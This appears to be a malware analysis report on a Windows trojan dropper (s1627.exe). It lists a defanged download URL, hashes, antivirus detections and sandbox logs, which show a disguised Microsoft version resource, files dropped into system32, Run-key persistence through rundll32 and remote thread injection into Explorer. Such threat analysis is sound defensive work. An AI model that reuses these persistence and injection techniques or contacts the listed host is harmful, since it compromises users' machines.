Download Link: hxxp://219.148.34.10/s1627.exe File Name: s1627.exe File size: 468480 bytes MD5: bb6e5ee4b0e429ae734d995026e01c20 SHA1: f0c0dc9f7c282c697b7caff9df70e7d86483c522 PEiD: PECompact 2.xx --> BitSum Technologies packers: PECompact packers: PecBundle, PECompact packers: PE_Patch.PECompact, PecBundle, PECompact Prevx info: http://info.prevx.com/aboutprogramtext.asp?PX5=71596CDA00D4EA73266607E815CAB5008BA3334F VirusTotal Result: 22/32 (68.75%) AhnLab-V3: Dropper/Agent.468480 AntiVir: TR/Drop.Agent.DGC.5 Authentium: Possibly a new variant of W32/Threat-SysVenFakP-based!Maximus Avast: Win32:Qhost-AYU AVG: Dropper.Generic.SZV CAT-QuickHeal: (Suspicious) - DNAScan DrWeb: Trojan.MulDrop.12121 eSafe: Suspicious File Ewido: Dropper.Agent.dgc F-Prot: W32/Threat-SysVenFakP-based!Maximus F-Secure: Trojan-Dropper.Win32.Agent.dgc Fortinet: W32/Agent.E613!tr.dldr Ikarus: Trojan-Dropper.Win32.Agent.dgc Kaspersky: Trojan-Dropper.Win32.Agent.dgc NOD32v2: Win32/TrojanDropper.Agent.NHD Panda: Adware/BaiduBar Prevx1: Heuristic: Suspicious Self Modifying EXE Rising: Dropper.Win32.Agent.zfw Sophos: Sus/Behav-1021 Symantec: Adware.Rugo VBA32: Trojan.Cinco Webwasher-Gateway: Trojan.Drop.Agent.DGC.5 File Info: PE Header Signature: 00004550 Machine: 014C - Intel 386 Number of sections: 0002 Time/Date stamp: 4758A69E Pointer to symbol table: 00000000 Number of symbols: 00000000 Size of optional header: 00E0 Characteristics: 010F Magic: 010B Linker version (major): 06 Linker version (minor): 00 Size of code: 00008000 Size of initialized data: 00074000 Size of uninitialized data: 00000000 Address of entry point: 00007FF8 Base of code: 00001000 Base of data: 00009000 Image base: 00400000 Section alignment: 00001000 File alignment: 00000200 OS version (major): 0004 OS version (minor): 0000 Image version (major): 0000 Image version (minor): 0000 Sub system version (major): 0004 Sub system version (minor): 0000 Win32 version: 00000000 Size of image: 0007F000 Size of headers: 00000400 
Checksum: 00077260 Sub system: 0002 - Windows graphical user interface (GUI) subsystem DLL characteristics: 0000 Size of stack reserve: 00100000 Size of stack commit: 00001000 Size of heap reserve: 00100000 Size of heap commit: 00001000 Loader flags: 00000000 Number of RVA: 00000010 PE Sections Section VirtSize VirtAddr PhysSize PhysAddr Flags .text 0007C000 00001000 00070A00 00000400 E0000060 .rsrc 00002000 0007D000 00001800 00070E00 E0000020 VERSIONINFO: FILEVERSION 5,1,2600,2180 PRODUCTVERSION 5,1,2600,2180 FILEOS 0x4 FILETYPE 0x1 { BLOCK "StringFileInfo" { BLOCK "080404b0" { VALUE "Comments", "" VALUE "CompanyName", "Microsoft Corporation" VALUE "FileDescription", "Windows NT Setup Executable" VALUE "FileVersion", "5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)" VALUE "InternalName", "setup" VALUE "LegalCopyright", "Copyright Microsoft Corporation(C) 2006" VALUE "LegalTrademarks", "" VALUE "OriginalFilename", "setup.exe" VALUE "PrivateBuild", "" VALUE "ProductName", "Microsoft Windows Operating System" VALUE "ProductVersion", "5.1.2600.2180" VALUE "SpecialBuild", "" } } BLOCK "VarFileInfo" { VALUE "Translation", 0x0804 0x04B0 } } When the executable runs, it drops an executable 86a01.exe in the %System% folder and starts it as a process. 
File Name: 86a01.exe File size: 118784 bytes MD5: e3a84c700311f8ae35453a9f21c49720 SHA1: 08a131466229fa79f958fff6a55b498e67aa593a PEiD: Armadillo v1.71 Bit9 info: http://fileadvisor.bit9.com/services/extinfo.aspx?md5=e3a84c700311f8ae35453a9f21c49720 Prevx info: http://info.prevx.com/aboutprogramtext.asp?PX5=AD05669A00C7F640D06901B739EA8E0063DC4FBB PE Header Signature: 00004550 Machine: 014C - Intel 386 Number of sections: 0004 Time/Date stamp: 47589EB7 Pointer to symbol table: 00000000 Number of symbols: 00000000 Size of optional header: 00E0 Characteristics: 010F Magic: 010B Linker version (major): 06 Linker version (minor): 00 Size of code: 00014000 Size of initialized data: 0000A000 Size of uninitialized data: 00000000 Address of entry point: 0000BECE Base of code: 00001000 Base of data: 00015000 Image base: 00400000 Section alignment: 00001000 File alignment: 00001000 OS version (major): 0004 OS version (minor): 0000 Image version (major): 0000 Image version (minor): 0000 Sub system version (major): 0004 Sub system version (minor): 0000 Win32 version: 00000000 Size of image: 0001F000 Size of headers: 00001000 Checksum: 00000000 Sub system: 0003 - Windows character-mode user interface (CUI) subsystem DLL characteristics: 0000 Size of stack reserve: 00100000 Size of stack commit: 00001000 Size of heap reserve: 00100000 Size of heap commit: 00001000 Loader flags: 00000000 Number of RVA: 00000010 PE Sections Section VirtSize VirtAddr PhysSize PhysAddr Flags .text 00013C45 00001000 00014000 00001000 60000020 .rdata 00002596 00015000 00003000 00015000 40000040 .data 00005F68 00018000 00004000 00018000 C0000040 .rsrc 000003A8 0001E000 00001000 0001C000 40000040 Import table (libraries: 4) ------------------------------------ KERNEL32.dll (imports: 66) ReadFile CreateFileA DeviceIoControl GetModuleHandleA GetEnvironmentVariableA MultiByteToWideChar WideCharToMultiByte LocalFree SetEndOfFile SetStdHandle IsBadCodePtr Sleep GetLastError GetModuleFileNameA 
CreateDirectoryA GetFileAttributesA DeleteFileA CreateProcessA WaitForSingleObject CloseHandle SetFileAttributesA CopyFileA CreateFileMappingA LoadLibraryA GetProcAddress FreeLibrary GetVersionExA GetWindowsDirectoryA lstrlenA IsBadReadPtr GetStringTypeW GetStringTypeA FlushFileBuffers SetFilePointer IsBadWritePtr VirtualAlloc WriteFile RtlUnwind RaiseException GetCommandLineA GetVersion ExitProcess HeapFree HeapAlloc HeapReAlloc TerminateProcess GetCurrentProcess LCMapStringA LCMapStringW GetCPInfo HeapSize GetACP GetOEMCP SetUnhandledExceptionFilter UnhandledExceptionFilter FreeEnvironmentStringsA FreeEnvironmentStringsW GetEnvironmentStrings GetEnvironmentStringsW SetHandleCount GetStdHandle GetFileType GetStartupInfoA HeapDestroy HeapCreate VirtualFree ADVAPI32.dll (imports: 18) RegisterServiceCtrlHandlerA SetServiceStatus StartServiceCtrlDispatcherA ControlService DeleteService StartServiceA QueryServiceStatus CreateServiceA ChangeServiceConfig2A RegCreateKeyA RegSetValueExA OpenSCManagerA OpenServiceA CloseServiceHandle DeregisterEventSource RegEnumValueA RegOpenKeyExA RegCloseKey ole32.dll (imports: 4) CoUninitialize CoGetClassObject StringFromCLSID CoInitialize OLEAUT32.dll (imports: 1) #9 VirusTotal Result: 20/32 (62.5%) AntiVir: TR/BHO.acv Avast: Win32:Qhost-AYU AVG: Generic9.ADCD CAT-QuickHeal: Trojan.BHO.acv ClamAV: Trojan.BHO-1289 Ewido: Trojan.BHO.acv F-Prot: W32/Trojan2.VDH F-Secure: Trojan.Win32.BHO.acv FileAdvisor: High threat detected Fortinet: Adware/Rugo Ikarus: Virus.Win32.Qhost.AYU Kaspersky: Trojan.Win32.BHO.acv NOD32v2: a variant of Win32/BHO.NCY Prevx1: TROJAN.AGENT.GEN Rising: AdWare.Win32.Agent.zpo Sophos: Mal/Generic-A Sunbelt: Trojan.BHO.acv Symantec: Infostealer.Gampass TheHacker: Trojan/BHO.acv Webwasher-Gateway: Trojan.BHO.acv File Info for s1627.exe: File System Activity: Get File Attributes: C:\WINDOWS\ Flags: (SECURITY_ANONYMOUS) Get File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ Flags: (SECURITY_ANONYMOUS) Create 
File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\setup.tmp Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\_uninstall Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\_uninstall Get File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0 Flags: (SECURITY_ANONYMOUS) Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\setup.tmp (OPEN_EXISTING) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll.zgx Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll.zgx.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll.zgx.tmp (OPEN_EXISTING) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll.zgx Set File Time: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll.zgx Move File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll.zgx to C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll Flags: (FILE_ATTRIBUTE_READONLY,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll.zgx Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll.zgx.tmp Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll.zgx.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll (OPEN_EXISTING) Set File Time: Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe.tmp (OPEN_EXISTING) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe Set File Time: 
C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe.tmp Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe (OPEN_EXISTING) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe Flags: (FILE_ATTRIBUTE_READONLY,SECURITY_ANONYMOUS) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll.zgx Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll.zgx.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll.zgx.tmp (OPEN_EXISTING) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll.zgx Set File Time: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll.zgx Move File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll.zgx to C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll Flags: (FILE_ATTRIBUTE_READONLY,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll.zgx Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll.zgx.tmp Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll.zgx.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll (OPEN_EXISTING) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ser.exe Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ser.exe.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ser.exe.tmp (OPEN_EXISTING) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ser.exe Set File Time: 
C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ser.exe Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ser.exe.tmp Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ser.exe.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ser.exe (OPEN_EXISTING) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ser.exe Flags: (FILE_ATTRIBUTE_READONLY,SECURITY_ANONYMOUS) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\setup.tmp Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\setup.tmp Set File Attributes: adsfe Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: dc Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: %$ Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: ~~ Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: dcd Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Open File: \\.\PhysicalDrive0 (OPEN_EXISTING) Open File: \\.\PhysicalDrive1 (OPEN_EXISTING) Open File: \\.\PhysicalDrive2 (OPEN_EXISTING) Open File: \\.\PhysicalDrive3 (OPEN_EXISTING) Set File Attributes: C:\WINDOWS\system32\ Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\WINDOWS\system32\311.dll Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\WINDOWS\system32\1831.dll Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\WINDOWS\system32\86a01.exe Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\WINDOWS\system32\3d311.dll Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\WINDOWS\ Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\WINDOWS\851.bmp Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\WINDOWS\5b21.exe Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\WINDOWS\b2c11.txt Flags: 
(FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\WINDOWS\2c1ee1.rm Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\WINDOWS\system32\86a01.exe Move File: C:\WINDOWS\system32\86a01.exe to Open File: \SystemRoot\AppPatch\sysmain.sdb (OPEN_EXISTING) Open File: \SystemRoot\AppPatch\systest.sdb (OPEN_EXISTING) Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING) Open File: C:\WINDOWS\system32\regsvr32.exe () Find File: regsvr32.exe Delete File: C:\WINDOWS\system32\1831.dll Move File: C:\WINDOWS\system32\1831.dll to Set File Attributes: C:\WINDOWS\system32\1831.dlltmp Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\WINDOWS\system32\1831.dlltmp Move File: C:\WINDOWS\system32\1831.dll to C:\WINDOWS\system32\1831.dlltmp Delete File: C:\WINDOWS\system32\311.dll Move File: C:\WINDOWS\system32\311.dll to Delete File: C:\WINDOWS\system32\3d311.dll Move File: C:\WINDOWS\system32\3d311.dll to Delete File: C:\WINDOWS\851.bmp Delete File: C:\WINDOWS\5b21.exe Delete File: C:\WINDOWS\b2c11.txt Delete File: C:\WINDOWS\2c1ee1.rm Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe () Find File: miniup.exe Get File Attributes: C:\WINDOWS\system32\311.dll Flags: (SECURITY_ANONYMOUS) Copy File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll to C:\WINDOWS\system32\311.dll Open File: C:\WINDOWS\system32\311.dll (OPEN_EXISTING) Set File Attributes: C:\WINDOWS\system32\311.dll Flags: (FILE_ATTRIBUTE_READONLY,SECURITY_ANONYMOUS) Copy File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\play.dll to C:\WINDOWS\851.bmp Open File: C:\WINDOWS\851.bmp (OPEN_EXISTING) Get File Attributes: C:\WINDOWS\system32\1831.dll Flags: (SECURITY_ANONYMOUS) Copy File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll to C:\WINDOWS\system32\1831.dll Open File: C:\WINDOWS\system32\1831.dll (OPEN_EXISTING) Set File Attributes: C:\WINDOWS\system32\1831.dll Flags: (FILE_ATTRIBUTE_READONLY,SECURITY_ANONYMOUS) Copy File: 
C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\bho.dll to C:\WINDOWS\5b21.exe Open File: C:\WINDOWS\5b21.exe (OPEN_EXISTING) Get File Attributes: C:\WINDOWS\system32\86a01.exe Flags: (SECURITY_ANONYMOUS) Copy File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ser.exe to C:\WINDOWS\system32\86a01.exe Copy File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\ser.exe to C:\WINDOWS\b2c11.txt Open File: C:\WINDOWS\b2c11.txt (OPEN_EXISTING) Open File: C:\WINDOWS\system32\86a01.exe () Find File: 86a01.exe Opens Mutex: 1951942714 Registry Reads: HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed" Process Management: Creates Process - Filename () CommandLine: (C:\WINDOWS\system32\86a01.exe -e) As User: () Creation Flags: () Creates Process - Filename () CommandLine: (C:\WINDOWS\system32\86a01.exe -u) As User: () Creation Flags: () Creates Process - Filename () CommandLine: (C:\WINDOWS\system32\regsvr32.exe /u /s "C:\WINDOWS\system32\1831.dll") As User: () Creation Flags: () Creates Process - Filename () CommandLine: (C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe) As User: () Creation Flags: () Creates Process - Filename () CommandLine: (C:\WINDOWS\system32\regsvr32.exe /s "C:\WINDOWS\system32\1831.dll") As User: () Creation Flags: () Creates Process - Filename () CommandLine: (C:\WINDOWS\system32\86a01.exe -i) As User: () Creation Flags: () System Info: Get System Directory Get System Time Process Started: Filename: C:\WINDOWS\system32\regsvr32.exe /u /s C:\WINDOWS\system32\1831.dll Filesize: 11776 bytes MD5: 9709ead856a690333138ac40804f914e Start Reason: CreateProcess function call Registry Reads: HKEY_CLASSES_ROOT\.dll "" Kill Process - Filename (s1627.exe) Process Started: Filename: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\tb4fe0\miniup.exe Filesize: 66560 bytes MD5: aecc5710067a0b9f3d670c27be3c3587 Start Reason: CreateProcess function call File System Activity: Get File Attributes: C:\WINDOWS\ Flags: (SECURITY_ANONYMOUS) Get File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\ 
Flags: (SECURITY_ANONYMOUS) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\setup.tmp Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\_uninstall Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\_uninstall Get File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o Flags: (SECURITY_ANONYMOUS) Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\setup.tmp (OPEN_EXISTING) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll.zgx Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll.zgx.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll.zgx.tmp (OPEN_EXISTING) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll.zgx Set File Time: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll.zgx Move File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll.zgx to C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll Flags: (FILE_ATTRIBUTE_READONLY,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll.zgx Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll.zgx.tmp Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll.zgx.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll (OPEN_EXISTING) Set File Time: Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll.zgx Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll.zgx.tmp Open 
File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll.zgx.tmp (OPEN_EXISTING) Create File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll.zgx Set File Time: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll.zgx Move File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll.zgx to C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll Flags: (FILE_ATTRIBUTE_READONLY,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll.zgx Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll.zgx.tmp Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll.zgx.tmp Open File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll (OPEN_EXISTING) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\setup.tmp Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\setup.tmp Get File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll Flags: (SECURITY_ANONYMOUS) Set File Attributes: C:\WINDOWS\Downlo~1\d6wqe4ci.dll Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Copy File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\up.dll to C:\WINDOWS\Downlo~1\d6wqe4ci.dll Open File: C:\WINDOWS\602384a2 (OPEN_EXISTING) Set File Attributes: cdd Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Create File: C:\WINDOWS\602384a2 Open File: \SystemRoot\AppPatch\sysmain.sdb (OPEN_EXISTING) Open File: \SystemRoot\AppPatch\systest.sdb (OPEN_EXISTING) Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING) Open File: C:\WINDOWS\system32\rundll32.exe () Find File: rundll32.exe Get File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\minidll.dll Flags: (SECURITY_ANONYMOUS) Set File Attributes: C:\WINDOWS\Downlo~1\bn6wuj.dll Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Copy File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\minidll.dll to C:\WINDOWS\Downlo~1\bn6wuj.dll Open File: C:\WINDOWS\9635-124-94 (OPEN_EXISTING) Create File: 
C:\WINDOWS\9635-124-94 Find File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\*.* Get File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\. Flags: (SECURITY_ANONYMOUS) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\. Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\. Get File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\.. Flags: (SECURITY_ANONYMOUS) Set File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\.. Flags: (FILE_ATTRIBUTE_NORMAL,SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\.. Get File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\miniDll.dll Flags: (SECURITY_ANONYMOUS) Get File Attributes: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\_uninstall Flags: (SECURITY_ANONYMOUS) Delete File: C:\DOCUME~1\Sandbox\LOCALS~1\Temp\z9o\_uninstall Registry Changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run "d6wqe4ci" = rundll32 "C:\WINDOWS\Downlo~1\d6wqe4ci.dll",start HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run "bn6wuj" = rundll32 "C:\WINDOWS\Downlo~1\bn6wuj.dll",Run Registry Reads: HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed" Process Management: Creates Process - Filename () CommandLine: (rundll32 "C:\WINDOWS\Downlo~1\d6wqe4ci.dll",start) As User: () Creation Flags: () Creates Process - Filename () CommandLine: (rundll32 "C:\WINDOWS\Downlo~1\bn6wuj.dll",Run) As User: () Creation Flags: () Kill Process - Filename () CommandLine: () Target PID: (1012) As User: () Creation Flags: () System Info Get System Directory Get Windows Directory Process Stsrted: Filename: rundll32 C:\WINDOWS\Downlo~1\d6wqe4ci.dll,start Filesize: 33280 bytes MD5: da285490bbd8a1d0ce6623577d5ba1ff Start Reason: CreateProcess function call File System Activity: Get File Attributes: C:\WINDOWS\Downlo~1\d6wqe4ci.dll Flags: (SECURITY_ANONYMOUS) Get File Attributes: C:\WINDOWS\Downlo~1\d6wqe4ci.dll.manifest Flags: 
(SECURITY_ANONYMOUS) Process Activity: Kill Process - Filename () CommandLine: () Target PID: (1128) As User: () Creation Flags: () Enum Processes Enum Modules - Target PID: (1128) Open Process - Filename (C:\WINDOWS\Explorer.EXE) Target PID: (1508) System Info: Get System Directory Threads: Create Remote Thread - Target PID (1508) Thread ID (1388) Thread ID ($7C80ACD3) Parameter Address ($00EA0000) Creation Flags (CREATE_SUSPENDED) Process Stsrted: Filename: rundll32 C:\WINDOWS\Downlo~1\bn6wuj.dll,Run Filesize: 33280 bytes MD5: da285490bbd8a1d0ce6623577d5ba1ff Start Reason: CreateProcess function call File System Activity: Get File Attributes: C:\WINDOWS\Downlo~1\bn6wuj.dll Flags: (SECURITY_ANONYMOUS) Get File Attributes: C:\WINDOWS\Downlo~1\bn6wuj.dll.manifest Flags: (SECURITY_ANONYMOUS) Process Activity: Kill Process - Filename () CommandLine: () Target PID: (1256) As User: () 